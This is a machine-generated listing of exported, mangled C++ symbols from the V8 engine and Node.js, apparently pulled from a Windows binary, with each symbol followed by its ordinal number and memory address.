                                                                                                                                                                                                                                    ?AsObjectBoilerplateDescription@ObjectRef@compiler@internal@v8@@QEBA?AVObjectBoilerplateDescriptionRef@234@XZ34780x141016030
                                                                                                                                                                                                                                    ?AsOtherNumberConstant@Type@compiler@internal@v8@@QEBAPEBVOtherNumberConstantType@234@XZ34790x140097290
                                                                                                                                                                                                                                    ?AsOverloadedFunctionType@AsmCallableType@wasm@internal@v8@@UEAAPEAVAsmOverloadedFunctionType@234@XZ34800x140098360
                                                                                                                                                                                                                                    ?AsOverloadedFunctionType@AsmOverloadedFunctionType@wasm@internal@v8@@UEAAPEAV1234@XZ34810x1400972c0
                                                                                                                                                                                                                                    ?AsOverloadedFunctionType@AsmType@wasm@internal@v8@@QEAAPEAVAsmOverloadedFunctionType@234@XZ34820x14072f4d0
                                                                                                                                                                                                                                    ?AsPropertyCell@ObjectRef@compiler@internal@v8@@QEBA?AVPropertyCellRef@234@XZ34830x141016180
                                                                                                                                                                                                                                    ?AsRange@Type@compiler@internal@v8@@QEBAPEBVRangeType@234@XZ34840x140097290
                                                                                                                                                                                                                                    ?AsRegExpBoilerplateDescription@ObjectRef@compiler@internal@v8@@QEBA?AVRegExpBoilerplateDescriptionRef@234@XZ34850x141016860
                                                                                                                                                                                                                                    ?AsScopeInfo@ObjectRef@compiler@internal@v8@@QEBA?AVScopeInfoRef@234@XZ34860x141016910
                                                                                                                                                                                                                                    ?AsScriptContextTable@ObjectRef@compiler@internal@v8@@QEBA?AVScriptContextTableRef@234@XZ34870x1410169c0
                                                                                                                                                                                                                                    ?AsSharedFunctionInfo@ObjectRef@compiler@internal@v8@@QEBA?AVSharedFunctionInfoRef@234@XZ34880x141016a40
                                                                                                                                                                                                                                    ?AsSmi@ObjectRef@compiler@internal@v8@@QEBAHXZ34890x141016af0
                                                                                                                                                                                                                                    ?AsSourceTextModule@ObjectRef@compiler@internal@v8@@QEBA?AVSourceTextModuleRef@234@XZ34900x141016b00
                                                                                                                                                                                                                                    ?AsString@ObjectRef@compiler@internal@v8@@QEBA?AVStringRef@234@XZ34910x141016bb0
                                                                                                                                                                                                                                    ?AsSymbol@ObjectRef@compiler@internal@v8@@QEBA?AVSymbolRef@234@XZ34920x141016c60
                                                                                                                                                                                                                                    ?AsTemplateObjectDescription@ObjectRef@compiler@internal@v8@@QEBA?AVTemplateObjectDescriptionRef@234@XZ34930x141016d10
                                                                                                                                                                                                                                    ?AsTuple@Type@compiler@internal@v8@@QEBAPEBVTupleType@234@XZ34940x140097290
                                                                                                                                                                                                                                    ?AsUnion@Type@compiler@internal@v8@@AEBAPEBVUnionType@234@XZ34950x140097290
                                                                                                                                                                                                                                    ?AsUnionForTesting@Type@compiler@internal@v8@@QEAAPEBVUnionType@234@XZ34960x14057e860
                                                                                                                                                                                                                                    ?AsUnsigned@AsmJsScanner@internal@v8@@QEBAIXZ34970x1407339e0
                                                                                                                                                                                                                                    ?AsValueType@AsmType@wasm@internal@v8@@QEAAPEAVAsmValueType@234@XZ34980x14072f4f0
                                                                                                                                                                                                                                    ?AsWasm@FrameSummary@internal@v8@@QEBAAEBVWasmFrameSummary@123@XZ34990x1400972c0
                                                                                                                                                                                                                                    ?AsanNew@Zone@internal@v8@@AEAAPEAX_K@Z35000x1407ae300
                                                                                                                                                                                                                                    ?AsmjsSignature@WasmOpcodes@wasm@internal@v8@@SAPEBV?$Signature@VValueType@wasm@internal@v8@@@34@W4WasmOpcode@234@@Z35010x1406204c0
                                                                                                                                                                                                                                    ?AssembleArchBinarySearchSwitch@CodeGenerator@compiler@internal@v8@@AEAAXPEAVInstruction@234@@Z35020x1405a73f0
                                                                                                                                                                                                                                    ?AssembleArchBinarySearchSwitchRange@CodeGenerator@compiler@internal@v8@@AEAAXVRegister@34@VRpoNumber@234@PEAU?$pair@HPEAVLabel@internal@v8@@@std@@2@Z35030x14106b6d0
                                                                                                                                                                                                                                    ?AssembleArchBoolean@CodeGenerator@compiler@internal@v8@@AEAAXPEAVInstruction@234@W4FlagsCondition@234@@Z35040x1405a76b0
                                                                                                                                                                                                                                    ?AssembleArchBranch@CodeGenerator@compiler@internal@v8@@AEAAXPEAVInstruction@234@PEAUBranchInfo@234@@Z35050x1405a77e0
                                                                                                                                                                                                                                    ?AssembleArchDeoptBranch@CodeGenerator@compiler@internal@v8@@AEAAXPEAVInstruction@234@PEAUBranchInfo@234@@Z35060x1405a7890
                                                                                                                                                                                                                                    ?AssembleArchInstruction@CodeGenerator@compiler@internal@v8@@AEAA?AW4CodeGenResult@1234@PEAVInstruction@234@@Z35070x1405a7a00
                                                                                                                                                                                                                                    ?AssembleArchJump@CodeGenerator@compiler@internal@v8@@AEAAXVRpoNumber@234@@Z35080x14106b830
                                                                                                                                                                                                                                    ?AssembleArchJumpRegardlessOfAssemblyOrder@CodeGenerator@compiler@internal@v8@@AEAAXVRpoNumber@234@@Z35090x1405ed2b0
                                                                                                                                                                                                                                    ?AssembleArchSelect@CodeGenerator@compiler@internal@v8@@AEAAXPEAVInstruction@234@W4FlagsCondition@234@@Z35100x1405ed2d0
                                                                                                                                                                                                                                    ?AssembleArchTableSwitch@CodeGenerator@compiler@internal@v8@@AEAAXPEAVInstruction@234@@Z35110x1405ed740
                                                                                                                                                                                                                                    ?AssembleArchTrap@CodeGenerator@compiler@internal@v8@@AEAAXPEAVInstruction@234@W4FlagsCondition@234@@Z35120x1405ed9d0
                                                                                                                                                                                                                                    ?AssembleBlock@CodeGenerator@compiler@internal@v8@@AEAA?AW4CodeGenResult@1234@PEBVInstructionBlock@234@@Z35130x14106b890
                                                                                                                                                                                                                                    ?AssembleCode@CodeGenerator@compiler@internal@v8@@QEAAXXZ35140x14106bc50
                                                                                                                                                                                                                                    ?AssembleCodeStartRegisterCheck@CodeGenerator@compiler@internal@v8@@AEAAXXZ35150x1405edac0
                                                                                                                                                                                                                                    ?AssembleConstructFrame@CodeGenerator@compiler@internal@v8@@AEAAXXZ35160x1405edb10
                                                                                                                                                                                                                                    ?AssembleDeconstructFrame@CodeGenerator@compiler@internal@v8@@AEAAXXZ35170x1405ee150
                                                                                                                                                                                                                                    ?AssembleDeoptimizerCall@CodeGenerator@compiler@internal@v8@@AEAA?AW4CodeGenResult@1234@PEAVDeoptimizationExit@234@@Z35180x14106c470
                                                                                                                                                                                                                                    ?AssembleGaps@CodeGenerator@compiler@internal@v8@@AEAAXPEAVInstruction@234@@Z35190x14106c560
                                                                                                                                                                                                                                    ?AssembleInstruction@CodeGenerator@compiler@internal@v8@@AEAA?AW4CodeGenResult@1234@HPEBVInstructionBlock@234@@Z35200x14106c5b0
                                                                                                                                                                                                                                    ?AssembleJumpTable@CodeGenerator@compiler@internal@v8@@AEAAXPEAPEAVLabel@34@_K@Z35210x1405ee1a0
                                                                                                                                                                                                                                    ?AssembleMove@CodeGenerator@compiler@internal@v8@@EEAAXPEAVInstructionOperand@234@0@Z35220x1405ee200
                                                                                                                                                                                                                                    ?AssemblePrepareTailCall@CodeGenerator@compiler@internal@v8@@AEAAXXZ35230x1405eeb90
                                                                                                                                                                                                                                    ?AssembleReturn@CodeGenerator@compiler@internal@v8@@AEAAXPEAVInstructionOperand@234@@Z35240x1405eec10
                                                                                                                                                                                                                                    ?AssembleSourcePosition@CodeGenerator@compiler@internal@v8@@QEAAXPEAVInstruction@234@@Z35250x14106c880
                                                                                                                                                                                                                                    ?AssembleSourcePosition@CodeGenerator@compiler@internal@v8@@QEAAXVSourcePosition@34@@Z35260x14106c930
                                                                                                                                                                                                                                    ?AssembleSwap@CodeGenerator@compiler@internal@v8@@EEAAXPEAVInstructionOperand@234@0@Z35270x1405ef1d0
                                                                                                                                                                                                                                    ?AssembleTailCallAfterGap@CodeGenerator@compiler@internal@v8@@AEAAXPEAVInstruction@234@H@Z35280x1405efa40
                                                                                                                                                                                                                                    ?AssembleTailCallBeforeGap@CodeGenerator@compiler@internal@v8@@AEAAXPEAVInstruction@234@H@Z35290x1405efaf0
                                                                                                                                                                                                                                    ?Assert@ReasonEnum@Paused@API@Debugger@protocol@v8_inspector@@3PEBDEB35300x142298c70
                                                                                                                                                                                                                                    ?Assert@TurboAssembler@internal@v8@@QEAAXW4Condition@23@W4AbortReason@23@@Z35310x1400971a0
                                                                                                                                                                                                                                    ?AssertBoundFunction@MacroAssembler@internal@v8@@QEAAXVRegister@23@@Z35320x1400971a0
                                                                                                                                                                                                                                    ?AssertCallableFunction@MacroAssembler@internal@v8@@QEAAXVRegister@23@@Z35330x1400971a0
                                                                                                                                                                                                                                    ?AssertCodeT@MacroAssembler@internal@v8@@QEAAXVRegister@23@@Z35340x1400971a0
                                                                                                                                                                                                                                    ?AssertConstructor@MacroAssembler@internal@v8@@QEAAXVRegister@23@@Z35350x1400971a0
                                                                                                                                                                                                                                    ?AssertDebugContext@Debug@internal@v8@@AEAAXXZ35360x1400971a0
                                                                                                                                                                                                                                    ?AssertFunction@MacroAssembler@internal@v8@@QEAAXVRegister@23@@Z35370x1400971a0
                                                                                                                                                                                                                                    ?AssertGeneratorObject@MacroAssembler@internal@v8@@QEAAXVRegister@23@@Z35380x1400971a0
                                                                                                                                                                                                                                    ?AssertHeld@Mutex@base@v8@@QEBAXXZ35390x1400971a0
                                                                                                                                                                                                                                    ?AssertHeld@RecursiveMutex@base@v8@@QEBAXXZ35400x1400971a0
                                                                                                                                                                                                                                    ?AssertHeldAndUnmark@Mutex@base@v8@@AEAAXXZ35410x1400971a0
                                                                                                                                                                                                                                    ?AssertLocked@PersistentRegionLock@internal@cppgc@@SAXXZ35420x14050c220
                                                                                                                                                                                                                                    ?AssertMainThreadIsOnlyThread@IsolateSafepoint@internal@v8@@QEAAXXZ35430x1400971a0
                                                                                                                                                                                                                                    ?AssertNoInvalidSlots@TypedSlotSet@internal@v8@@QEAAXAEBV?$map@IIU?$less@I@std@@V?$allocator@U?$pair@$$CBII@std@@@2@@std@@@Z35440x140a9ce30
                                                                                                                                                                                                                                    ?AssertNotSmi@TurboAssembler@internal@v8@@QEAAXVRegister@23@@Z35450x1400971a0
                                                                                                                                                                                                                                    ?AssertSmi@TurboAssembler@internal@v8@@QEAAXVOperand@23@@Z35460x1400971a0
                                                                                                                                                                                                                                    ?AssertSmi@TurboAssembler@internal@v8@@QEAAXVRegister@23@@Z35470x1400971a0
                                                                                                                                                                                                                                    ?AssertType@SimplifiedOperatorBuilder@compiler@internal@v8@@QEAAPEBVOperator@234@VType@234@@Z35480x1410d4e70
                                                                                                                                                                                                                                    ?AssertUndefinedOrAllocationSite@MacroAssembler@internal@v8@@QEAAXVRegister@23@@Z35490x1400971a0
                                                                                                                                                                                                                                    ?AssertUnheld@Mutex@base@v8@@QEBAXXZ35500x1400971a0
                                                                                                                                                                                                                                    ?AssertUnheldAndMark@Mutex@base@v8@@AEAAXXZ35510x1400971a0
                                                                                                                                                                                                                                    ?AssertUnreachable@TurboAssembler@internal@v8@@QEAAXW4AbortReason@23@@Z35520x1400971a0
                                                                                                                                                                                                                                    ?AssertZeroExtended@TurboAssembler@internal@v8@@QEAAXVRegister@23@@Z35530x1400971a0
                                                                                                                                                                                                                                    ?AssignBignum@Bignum@base@v8@@QEAAXAEBV123@@Z35540x141003b60
                                                                                                                                                                                                                                    ?AssignDecimalString@Bignum@base@v8@@QEAAXV?$Vector@$$CBD@23@@Z35550x141003bf0
                                                                                                                                                                                                                                    ?AssignHexString@Bignum@base@v8@@QEAAXV?$Vector@$$CBD@23@@Z35560x141003ef0
                                                                                                                                                                                                                                    ?AssignPowerUInt16@Bignum@base@v8@@QEAAXGH@Z35570x1410040e0
                                                                                                                                                                                                                                    ?AssignRange@WasmCodeManager@wasm@internal@v8@@AEAAXVAddressRegion@base@4@PEAVNativeModule@234@@Z35580x14065fe50
                                                                                                                                                                                                                                    ?AssignUInt16@Bignum@base@v8@@QEAAXG@Z35590x1410042f0
                                                                                                                                                                                                                                    ?AssignUInt64@Bignum@base@v8@@QEAAX_K@Z35600x141004350
                                                                                                                                                                                                                                    ?AsyncCompile@WasmEngine@wasm@internal@v8@@QEAAXPEAVIsolate@34@AEBVWasmFeatures@234@V?$shared_ptr@VCompilationResultResolver@wasm@internal@v8@@@std@@AEBUModuleWireBytes@234@_NPEBD@Z35610x14064ac30
                                                                                                                                                                                                                                    ?AsyncFunctionEnter@JSOperatorBuilder@compiler@internal@v8@@QEAAPEBVOperator@234@XZ35620x1410c2470
                                                                                                                                                                                                                                    ?AsyncFunctionReject@JSOperatorBuilder@compiler@internal@v8@@QEAAPEBVOperator@234@XZ35630x1410c2480
                                                                                                                                                                                                                                    ?AsyncFunctionResolve@JSOperatorBuilder@compiler@internal@v8@@QEAAPEBVOperator@234@XZ35640x1410c2490
                                                                                                                                                                                                                                    ?AsyncHooksGetExecutionAsyncId@node@@YANPEAVIsolate@v8@@@Z35650x14029b590
                                                                                                                                                                                                                                    ?AsyncHooksGetTriggerAsyncId@node@@YANPEAVIsolate@v8@@@Z35660x14029b5c0
                                                                                                                                                                                                                                    ?AsyncInstantiate@WasmEngine@wasm@internal@v8@@QEAAXPEAVIsolate@34@V?$unique_ptr@VInstantiationResultResolver@wasm@internal@v8@@U?$default_delete@VInstantiationResultResolver@wasm@internal@v8@@@std@@@std@@V?$Handle@VWasmModuleObject@internal@v8@@@34@V?$MaybeHandle@VJSReceiver@internal@v8@@@34@@Z35670x14064b170
                                                                                                                                                                                                                                    ?AsyncIteratorSymbolConstantPoolEntry@BytecodeArrayBuilder@interpreter@internal@v8@@QEAA_KXZ35680x140a591c0
                                                                                                                                                                                                                                    ?AtExit@node@@YAXPEAVEnvironment@1@P6AXPEAX@Z1@Z35690x14029b5f0
                                                                                                                                                                                                                                    ?AtLoopHeader@ResumeJumpTarget@compiler@internal@v8@@SA?AV1234@HAEBV1234@@Z35700x141247c40
                                                                                                                                                                                                                                    ?AtPut@?$Dictionary@VGlobalDictionary@internal@v8@@VGlobalDictionaryShape@23@@internal@v8@@KA?AV?$Handle@VGlobalDictionary@internal@v8@@@23@PEAVIsolate@23@V423@V?$Handle@VName@internal@v8@@@23@V?$Handle@VObject@internal@v8@@@23@VPropertyDetails@23@@Z35710x140908700
                                                                                                                                                                                                                                    ?AtPut@?$Dictionary@VNameDictionary@internal@v8@@VNameDictionaryShape@23@@internal@v8@@KA?AV?$Handle@VNameDictionary@internal@v8@@@23@PEAVIsolate@23@V423@V?$Handle@VName@internal@v8@@@23@V?$Handle@VObject@internal@v8@@@23@VPropertyDetails@23@@Z35720x1409087f0
                                                                                                                                                                                                                                    ?AtPut@?$Dictionary@VNumberDictionary@internal@v8@@VNumberDictionaryShape@23@@internal@v8@@KA?AV?$Handle@VNumberDictionary@internal@v8@@@23@PEAVIsolate@23@V423@IV?$Handle@VObject@internal@v8@@@23@VPropertyDetails@23@@Z35730x1409088f0
                                                                                                                                                                                                                                    ?AtPut@?$Dictionary@VSimpleNumberDictionary@internal@v8@@VSimpleNumberDictionaryShape@23@@internal@v8@@KA?AV?$Handle@VSimpleNumberDictionary@internal@v8@@@23@PEAVIsolate@23@V423@IV?$Handle@VObject@internal@v8@@@23@VPropertyDetails@23@@Z35740x140908a00
                                                                                                                                                                                                                                    ?AtomicAdd64@RawMachineAssembler@compiler@internal@v8@@QEAAPEAVNode@234@PEAV5234@000@Z35750x1410a61f0
                                                                                                                                                                                                                                    ?AtomicAdd@CodeAssembler@compiler@internal@v8@@QEAA?AV?$TNode@UWord32T@internal@v8@@@34@VMachineType@34@V?$TNode@URawPtrT@internal@v8@@@34@V?$TNode@UUintPtrT@internal@v8@@@34@V534@@Z35760x1410a6290
                                                                                                                                                                                                                                    ?AtomicAdd@RawMachineAssembler@compiler@internal@v8@@QEAAPEAVNode@234@VMachineType@34@PEAV5234@11@Z35770x1410a62e0
                                                                                                                                                                                                                                    ?AtomicAnd64@RawMachineAssembler@compiler@internal@v8@@QEAAPEAVNode@234@PEAV5234@000@Z35780x1410a6360
                                                                                                                                                                                                                                    ?AtomicAnd@CodeAssembler@compiler@internal@v8@@QEAA?AV?$TNode@UWord32T@internal@v8@@@34@VMachineType@34@V?$TNode@URawPtrT@internal@v8@@@34@V?$TNode@UUintPtrT@internal@v8@@@34@V534@@Z35790x1410a6400
                                                                                                                                                                                                                                    ?AtomicAnd@RawMachineAssembler@compiler@internal@v8@@QEAAPEAVNode@234@VMachineType@34@PEAV5234@11@Z35800x1410a6450
                                                                                                                                                                                                                                    ?AtomicCompareExchange64@RawMachineAssembler@compiler@internal@v8@@QEAAPEAVNode@234@PEAV5234@00000@Z35810x1410a64d0
                                                                                                                                                                                                                                    ?AtomicCompareExchange@CodeAssembler@compiler@internal@v8@@QEAA?AV?$TNode@UWord32T@internal@v8@@@34@VMachineType@34@V?$TNode@URawPtrT@internal@v8@@@34@V?$TNode@UWordT@internal@v8@@@34@V534@3@Z35820x1410a65a0
                                                                                                                                                                                                                                    ?AtomicCompareExchange@RawMachineAssembler@compiler@internal@v8@@QEAAPEAVNode@234@VMachineType@34@PEAV5234@111@Z35830x1410a6600
                                                                                                                                                                                                                                    ?AtomicExchange64@RawMachineAssembler@compiler@internal@v8@@QEAAPEAVNode@234@PEAV5234@000@Z35840x1410a6680
                                                                                                                                                                                                                                    ?AtomicExchange@CodeAssembler@compiler@internal@v8@@QEAA?AV?$TNode@UWord32T@internal@v8@@@34@VMachineType@34@V?$TNode@URawPtrT@internal@v8@@@34@V?$TNode@UUintPtrT@internal@v8@@@34@V534@@Z35850x1410a6720
                                                                                                                                                                                                                                    ?AtomicExchange@RawMachineAssembler@compiler@internal@v8@@QEAAPEAVNode@234@VMachineType@34@PEAV5234@11@Z35860x1410a6770
                                                                                                                                                                                                                                    ?AtomicLoad64@RawMachineAssembler@compiler@internal@v8@@QEAAPEAVNode@234@VAtomicLoadParameters@234@PEAV5234@1@Z35870x1410a67f0
                                                                                                                                                                                                                                    ?AtomicLoad@CodeAssembler@compiler@internal@v8@@AEAAPEAVNode@234@VMachineType@34@W4AtomicMemoryOrder@34@V?$TNode@URawPtrT@internal@v8@@@34@V?$TNode@UWordT@internal@v8@@@34@@Z35880x1410a6870
                                                                                                                                                                                                                                    ?AtomicLoad@RawMachineAssembler@compiler@internal@v8@@QEAAPEAVNode@234@VAtomicLoadParameters@234@PEAV5234@1@Z35890x1410a68e0
                                                                                                                                                                                                                                    ?AtomicLoadParametersOf@compiler@internal@v8@@YA?AVAtomicLoadParameters@123@PEBVOperator@123@@Z35900x141051660
                                                                                                                                                                                                                                    ?AtomicOr64@RawMachineAssembler@compiler@internal@v8@@QEAAPEAVNode@234@PEAV5234@000@Z35910x1410a6950
                                                                                                                                                                                                                                    ?AtomicOr@CodeAssembler@compiler@internal@v8@@QEAA?AV?$TNode@UWord32T@internal@v8@@@34@VMachineType@34@V?$TNode@URawPtrT@internal@v8@@@34@V?$TNode@UUintPtrT@internal@v8@@@34@V534@@Z35920x1410a69f0
                                                                                                                                                                                                                                    ?AtomicOr@RawMachineAssembler@compiler@internal@v8@@QEAAPEAVNode@234@VMachineType@34@PEAV5234@11@Z35930x1410a6a40
                                                                                                                                                                                                                                    ?AtomicStore64@CodeAssembler@compiler@internal@v8@@QEAAXW4AtomicMemoryOrder@34@V?$TNode@URawPtrT@internal@v8@@@34@V?$TNode@UWordT@internal@v8@@@34@V?$TNode@UUintPtrT@internal@v8@@@34@3@Z35940x1410a6ac0
                                                                                                                                                                                                                                    ?AtomicStore64@RawMachineAssembler@compiler@internal@v8@@QEAAPEAVNode@234@VAtomicStoreParameters@234@PEAV5234@111@Z35950x1410a6b70
                                                                                                                                                                                                                                    ?AtomicStore@CodeAssembler@compiler@internal@v8@@QEAAXW4MachineRepresentation@34@W4AtomicMemoryOrder@34@V?$TNode@URawPtrT@internal@v8@@@34@V?$TNode@UWordT@internal@v8@@@34@V?$TNode@UWord32T@internal@v8@@@34@@Z35960x1410a6c20
                                                                                                                                                                                                                                    ?AtomicStore@RawMachineAssembler@compiler@internal@v8@@QEAAPEAVNode@234@VAtomicStoreParameters@234@PEAV5234@11@Z35970x1410a6cc0
                                                                                                                                                                                                                                    ?AtomicStoreParametersOf@compiler@internal@v8@@YAAEBVAtomicStoreParameters@123@PEBVOperator@123@@Z35980x1403a2160
                                                                                                                                                                                                                                    ?AtomicStoreTaggedField@TurboAssembler@internal@v8@@QEAAXVOperand@23@VRegister@23@@Z35990x1405f41e0
                                                                                                                                                                                                                                    ?AtomicSub64@RawMachineAssembler@compiler@internal@v8@@QEAAPEAVNode@234@PEAV5234@000@Z36000x1410a6d50
                                                                                                                                                                                                                                    ?AtomicSub@CodeAssembler@compiler@internal@v8@@QEAA?AV?$TNode@UWord32T@internal@v8@@@34@VMachineType@34@V?$TNode@URawPtrT@internal@v8@@@34@V?$TNode@UUintPtrT@internal@v8@@@34@V534@@Z36010x1410a6df0
                                                                                                                                                                                                                                    ?AtomicSub@RawMachineAssembler@compiler@internal@v8@@QEAAPEAVNode@234@VMachineType@34@PEAV5234@11@Z36020x1410a6e40
                                                                                                                                                                                                                                    ?AtomicXor64@RawMachineAssembler@compiler@internal@v8@@QEAAPEAVNode@234@PEAV5234@000@Z36030x1410a6ec0
                                                                                                                                                                                                                                    ?AtomicXor@CodeAssembler@compiler@internal@v8@@QEAA?AV?$TNode@UWord32T@internal@v8@@@34@VMachineType@34@V?$TNode@URawPtrT@internal@v8@@@34@V?$TNode@UUintPtrT@internal@v8@@@34@V534@@Z36040x1410a6f60
                                                                                                                                                                                                                                    ?AtomicXor@RawMachineAssembler@compiler@internal@v8@@QEAAPEAVNode@234@VMachineType@34@PEAV5234@11@Z36050x1410a6fb0
                                                                                                                                                                                                                                    ?Attach@JSArrayBuffer@internal@v8@@QEAAXV?$shared_ptr@VBackingStore@internal@v8@@@std@@@Z36060x140997a60
                                                                                                                                                                                                                                    ?AttachCppHeap@Heap@internal@v8@@QEAAXPEAVCppHeap@3@@Z36070x140aff380
                                                                                                                                                                                                                                    ?AttachCppHeap@Isolate@v8@@QEAAXPEAVCppHeap@2@@Z36080x140c78b90
                                                                                                                                                                                                                                    ?AttachDeoptInlinedFrames@ProfilerListener@internal@v8@@AEAAXV?$Handle@VCode@internal@v8@@@23@PEAVCodeDeoptEventRecord@23@@Z36090x1408621a0
                                                                                                                                                                                                                                    ?AttachIsolate@CppHeap@internal@v8@@QEAAXPEAVIsolate@23@@Z36100x140b3eb20
                                                                                                                                                                                                                                    ?AttachLocalIsolate@JSHeapBroker@compiler@internal@v8@@QEAAXPEAVOptimizedCompilationInfo@34@PEAVLocalIsolate@34@@Z36110x1410b69d0
                                                                                                                                                                                                                                    ?AttachOrEmitDeferredSourceInfo@BytecodeArrayBuilder@interpreter@internal@v8@@AEAAXPEAVBytecodeNode@234@@Z36120x140a591d0
                                                                                                                                                                                                                                    ?AttachPersistentHandles@LocalHeap@internal@v8@@QEAAXV?$unique_ptr@VPersistentHandles@internal@v8@@U?$default_delete@VPersistentHandles@internal@v8@@@std@@@std@@@Z36130x140af1af0
                                                                                                                                                                                                                                    ?AttachSharedWasmMemoryObject@BackingStore@internal@v8@@QEAAXPEAVIsolate@23@V?$Handle@VWasmMemoryObject@internal@v8@@@23@@Z36140x140a065a0
                                                                                                                                                                                                                                    ?AttachToNext@LiveRange@compiler@internal@v8@@QEAAXXZ36150x141109870
                                                                                                                                                                                                                                    ?AttachToSharedIsolate@Isolate@internal@v8@@AEAAXXZ36160x140b64b40
                                                                                                                                                                                                                                    ?AutomaticallyRestoreInitialHeapLimit@Heap@internal@v8@@QEAAXN@Z36170x140aff3f0
                                                                                                                                                                                                                                    ?AutomaticallyRestoreInitialHeapLimit@Isolate@v8@@QEAAXN@Z36180x140c78be0
                                                                                                                                                                                                                                    ?Available@LargeObjectSpace@internal@v8@@UEBA_KXZ36190x140098360
                                                                                                                                                                                                                                    ?Available@NewSpace@internal@v8@@UEBA_KXZ36200x14053e220
                                                                                                                                                                                                                                    ?Available@PagedSpace@internal@v8@@UEBA_KXZ36210x140aac530
                                                                                                                                                                                                                                    ?AverageMarkCompactMutatorUtilization@GCTracer@internal@v8@@QEBANXZ36220x140b1a090
                                                                                                                                                                                                                                    ?AverageSpeed@GCTracer@internal@v8@@CANAEBV?$RingBuffer@U?$pair@_KN@std@@@base@3@@Z36230x140b1a0c0
                                                                                                                                                                                                                                    ?AverageSpeed@GCTracer@internal@v8@@CANAEBV?$RingBuffer@U?$pair@_KN@std@@@base@3@AEBU?$pair@_KN@std@@N@Z36240x140b1a150
                                                                                                                                                                                                                                    ?AverageSurvivalRatio@GCTracer@internal@v8@@QEBANXZ36250x140b1a1d0
                                                                                                                                                                                                                                    ?AverageTimeToIncrementalMarkingTask@GCTracer@internal@v8@@QEBANXZ36260x140b1a2f0
                                                                                                                                                                                                                                    ?AwaitCompileTasks@OptimizingCompileDispatcher@internal@v8@@QEAAXXZ36270x140bd7d00
                                                                                                                                                                                                                                    ?Backtrack@RegExpBytecodeGenerator@internal@v8@@UEAAXXZ36280x140853c70
                                                                                                                                                                                                                                    ?Backtrack@RegExpMacroAssemblerX64@internal@v8@@UEAAXXZ36290x14056dfb0
                                                                                                                                                                                                                                    ?Bailout@PreparseDataBuilder@internal@v8@@QEAAXXZ36300x14053e2a0
                                                                                                                                                                                                                                    ?BailoutIfDeoptimized@CodeGenerator@compiler@internal@v8@@AEAAXXZ36310x1405efe10
                                                                                                                                                                                                                                    ?BailoutIfDeoptimized@TurboAssembler@internal@v8@@QEAAXVRegister@23@@Z36320x1405f4230
                                                                                                                                                                                                                                    ?BasicBlockCount@Schedule@compiler@internal@v8@@QEBA_KXZ36330x14051ff40
                                                                                                                                                                                                                                    ?BeginArray@TracedValue@tracing@v8@@QEAAXPEBD@Z36340x14010a5d0
                                                                                                                                                                                                                                    ?BeginArray@TracedValue@tracing@v8@@QEAAXXZ36350x1407be030
                                                                                                                                                                                                                                    ?BeginDictionary@TracedValue@tracing@v8@@QEAAXPEBD@Z36360x14010a630
                                                                                                                                                                                                                                    ?BeginDictionary@TracedValue@tracing@v8@@QEAAXXZ36370x1407be0d0
                                                                                                                                                                                                                                    ?BeginFinally@TryFinallyBuilder@interpreter@internal@v8@@QEAAXXZ36380x140a33720
                                                                                                                                                                                                                                    ?BeginHandler@TryFinallyBuilder@interpreter@internal@v8@@QEAAXXZ36390x140a33770
                                                                                                                                                                                                                                    ?BeginRegion@CommonOperatorBuilder@compiler@internal@v8@@QEAAPEBVOperator@234@W4RegionObservability@234@@Z36400x1410396e0
                                                                                                                                                                                                                                    ?BeginTry@TryCatchBuilder@interpreter@internal@v8@@QEAAXVRegister@234@@Z36410x140a337a0
                                                                                                                                                                                                                                    ?BeginTry@TryFinallyBuilder@interpreter@internal@v8@@QEAAXVRegister@234@@Z36420x140a337a0
                                                                                                                                                                                                                                    ?BigInt64Array_string@Factory@internal@v8@@QEAA?AV?$Handle@VString@internal@v8@@@23@XZ36430x14053e2b0
                                                                                                                                                                                                                                    ?BigInt64Array_string@LocalFactory@internal@v8@@QEAA?AV?$Handle@VString@internal@v8@@@23@XZ36440x1407df2f0
                                                                                                                                                                                                                                    ?BigInt@Type@compiler@internal@v8@@SA?AV1234@XZ36450x14057e870
                                                                                                                                                                                                                                    ?BigIntAdd@OperationTyper@compiler@internal@v8@@QEAA?AVType@234@V5234@0@Z36460x141249af0
                                                                                                                                                                                                                                    ?BigIntAdd@SimplifiedOperatorBuilder@compiler@internal@v8@@QEAAPEBVOperator@234@XZ36470x1410d4f10
                                                                                                                                                                                                                                    ?BigIntMapConstant@JSGraph@compiler@internal@v8@@QEAAPEAVNode@234@XZ36480x1410de9e0
                                                                                                                                                                                                                                    ?BigIntMapConstant@JSGraphAssembler@compiler@internal@v8@@QEAA?AV?$TNode@VMap@internal@v8@@@34@XZ36490x1410e15d0
                                                                                                                                                                                                                                    ?BigIntNegate@OperationTyper@compiler@internal@v8@@QEAA?AVType@234@V5234@@Z36500x141249b20
                                                                                                                                                                                                                                    ?BigIntNegate@SimplifiedOperatorBuilder@compiler@internal@v8@@QEAAPEBVOperator@234@XZ36510x1410d4f20
                                                                                                                                                                                                                                    ?BigIntSubtract@OperationTyper@compiler@internal@v8@@QEAA?AVType@234@V5234@0@Z36520x141249af0
                                                                                                                                                                                                                                    ?BigIntSubtract@SimplifiedOperatorBuilder@compiler@internal@v8@@QEAAPEBVOperator@234@XZ36530x1410d4f30
                                                                                                                                                                                                                                    ?BigInt_string@Factory@internal@v8@@QEAA?AV?$Handle@VString@internal@v8@@@23@XZ36540x14053e2c0
                                                                                                                                                                                                                                    ?BigInt_string@LocalFactory@internal@v8@@QEAA?AV?$Handle@VString@internal@v8@@@23@XZ36550x1407df300
                                                                                                                                                                                                                                    ?BigUint64Array_string@Factory@internal@v8@@QEAA?AV?$Handle@VString@internal@v8@@@23@XZ36560x14053e2d0
                                                                                                                                                                                                                                    ?BigUint64Array_string@LocalFactory@internal@v8@@QEAA?AV?$Handle@VString@internal@v8@@@23@XZ36570x1407df310
                                                                                                                                                                                                                                    ?BigitAt@Bignum@base@v8@@AEBAIH@Z36580x141004420
                                                                                                                                                                                                                                    ?BigitLength@Bignum@base@v8@@AEBAHXZ36590x140ffdcb0
                                                                                                                                                                                                                                    ?BigitsShiftLeft@Bignum@base@v8@@AEAAXH@Z36600x141004450
                                                                                                                                                                                                                                    ?BignumDtoa@base@v8@@YAXNW4BignumDtoaMode@12@HV?$Vector@D@12@PEAH2@Z36610x141001400
                                                                                                                                                                                                                                    ?BinaryOpForAssignment@Token@internal@v8@@SA?AW4Value@123@W44123@@Z36620x14053e2e0
                                                                                                                                                                                                                                    ?BinaryOperation@BytecodeArrayBuilder@interpreter@internal@v8@@QEAAAEAV1234@W4Value@Token@34@VRegister@234@H@Z36630x140a59230
